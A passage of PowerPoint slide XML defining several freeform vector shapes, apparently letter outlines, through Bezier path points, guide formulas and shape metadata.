                    <a:pt x="249" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="185"/>
                    <a:pt x="236" y="185"/>
                    <a:pt x="229" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="31"/>
                    <a:pt x="143" y="31"/>
                    <a:pt x="150" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="182"/>
                    <a:pt x="132" y="188"/>
                    <a:pt x="116" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="188"/>
                    <a:pt x="76" y="172"/>
                    <a:pt x="76" y="156"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="5"/>
                    <a:pt x="73" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="159"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="76" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="172" y="19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1" name="Freeform 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8626C444-3097-4069-BF59-CDB0A5D7387C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId119"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4522788" y="2605088"/>
              <a:ext cx="109538" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 37 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="37" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="11" y="34"/>
                    <a:pt x="29" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="14" y="218"/>
                    <a:pt x="21" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="31"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="162" y="188"/>
                    <a:pt x="144" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="195" y="218"/>
                    <a:pt x="202" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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2" name="Freeform 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771386D6-A719-4C8A-9B5A-59A5026F1286}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId120"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4646613" y="2605088"/>
              <a:ext cx="85725" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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3" name="Freeform 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB6F910-7F9F-4885-9DF7-F6552FC87680}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId121"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4748213" y="2605088"/>
              <a:ext cx="104775" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 249"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 249"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 249"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 249"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="11"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="188"/>
                    <a:pt x="107" y="188"/>
                    <a:pt x="99" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="50"/>
                    <a:pt x="114" y="31"/>
                    <a:pt x="139" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="31"/>
                    <a:pt x="173" y="45"/>
                    <a:pt x="173" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="188"/>
                    <a:pt x="133" y="188"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="188"/>
                    <a:pt x="237" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="77" y="2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4" name="Freeform 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E932DC31-051F-4658-A4AF-2E4B964E823A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId122"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4860925" y="2576513"/>
              <a:ext cx="90488" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 212"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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5" name="Freeform 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C32EC1E-541F-4E4E-869B-D94748396C93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId123"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5008563" y="2686050"/>
              <a:ext cx="26988" cy="31750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 32 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
